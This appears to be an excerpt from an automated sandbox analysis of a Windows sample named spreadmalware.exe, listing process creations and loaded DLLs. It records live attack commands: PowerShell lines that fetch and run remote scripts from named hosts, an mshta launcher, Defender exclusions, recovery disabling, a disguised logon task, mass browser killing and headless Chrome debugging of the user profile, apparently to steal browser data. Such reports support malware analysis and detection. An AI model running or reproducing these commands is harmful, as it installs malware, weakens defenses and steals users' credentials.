Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM orbitum.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM centbrowser.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM 7star.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM vivaldi.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM epicprivacybrowser.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM uran.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM yandex.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM iridium.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --remote-allow-origins=* --headless "--user-data-dir=C:\Users\user\AppData\Local\Google\Chrome\User Data"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=1716 --field-trial-handle=1420,i,15861120058079520780,17955298355358665640,262144 --disable-features=PaintHolding /prefetch:8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM brave.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM opera.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM kometa.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM orbitum.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM centbrowser.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM sputnik.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM vivaldi.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM epicprivacybrowser.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM uran.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM yandex.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM iridium.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "Microsoft Defender Threat Intelligence Handler" /sc ONLOGON /tr C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exe /rl HIGHEST
Source: unknown	Process created: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exe C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exe
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\spreadmalware.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C powershell "iwr https://pastejustit.com/raw/msdcgy3bxg \| iex"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell "iwr https://pastejustit.com/raw/msdcgy3bxg \| iex"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\runtime.bat" "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i "echo" "C:\Users\user\AppData\Roaming\runtime.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo \\user-PC "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i "DADDYSERVER"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i "echo" "C:\Users\user\AppData\Roaming\runtime.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wmic computersystem get manufacturer /value	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i "echo" "C:\Users\user\AppData\Roaming\runtime.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i "echo" "C:\Users\user\AppData\Roaming\runtime.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i "echo" "C:\Users\user\AppData\Roaming\runtime.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\doskey.exe doskey /listsize=0	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wmic computersystem get manufacturer /value	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta vbscript:CreateObject("WScript.Shell").Run("powershell -command ""iwr('https://raw.githubusercontent.com/43a1723/test/main/download.ps1') \| iex""",0)(window.close)	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get manufacturer /value	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get manufacturer /value	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "iwr('https://raw.githubusercontent.com/43a1723/test/main/download.ps1') \| iex"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\m1dly232\m1dly232.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +h +s C:\ProgramData\Loader..{21EC2020-3AEA-1069-A2DD-08002B30309D}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://raw.githubusercontent.com/43a1723/test/refs/heads/main/Mewing'))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://raw.githubusercontent.com/43a1723/test/refs/heads/main/shellcode/loaderclient.ps1'))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command iwr 'https://github.com/EvilBytecode/Sryxen/releases/download/v1.0.0/sryxen_loader.ps1' \| iex
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES8ECC.tmp" "c:\Users\user\AppData\Local\Temp\m1dly232\CSC716D4489C5CC45ECB9EB6334571A58C.TMP"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iwr('https://raw.githubusercontent.com/43a1723/test/main/download.ps1')\|iex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\c2ejd4wa\c2ejd4wa.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +h +s C:\ProgramData\Loader..{21EC2020-3AEA-1069-A2DD-08002B30309D}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://raw.githubusercontent.com/43a1723/test/refs/heads/main/Mewing'))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://raw.githubusercontent.com/43a1723/test/refs/heads/main/shellcode/loaderclient.ps1'))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command iwr 'https://github.com/EvilBytecode/Sryxen/releases/download/v1.0.0/sryxen_loader.ps1' \| iex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESB485.tmp" "c:\Users\user\AppData\Local\Temp\c2ejd4wa\CSC99BE4B68E03746B880F950F6606729FB.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\ReAgentc.exe reagentc.exe /disable
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM firefox.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM brave.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM opera.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM kometa.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM orbitum.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM centbrowser.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM 7star.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM firefox.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM vivaldi.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM epicprivacybrowser.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM uran.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM yandex.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM iridium.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM kometa.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM yandex.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM brave.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM opera.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM kometa.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM orbitum.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM centbrowser.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM sputnik.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM vivaldi.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM epicprivacybrowser.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM uran.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM yandex.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM iridium.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "Microsoft Defender Threat Intelligence Handler" /sc ONLOGON /tr C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exe /rl HIGHEST
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESB485.tmp" "c:\Users\user\AppData\Local\Temp\c2ejd4wa\CSC99BE4B68E03746B880F950F6606729FB.TMP"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=1716 --field-trial-handle=1420,i,15861120058079520780,17955298355358665640,262144 --disable-features=PaintHolding /prefetch:8

Source: C:\Users\user\Desktop\spreadmalware.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
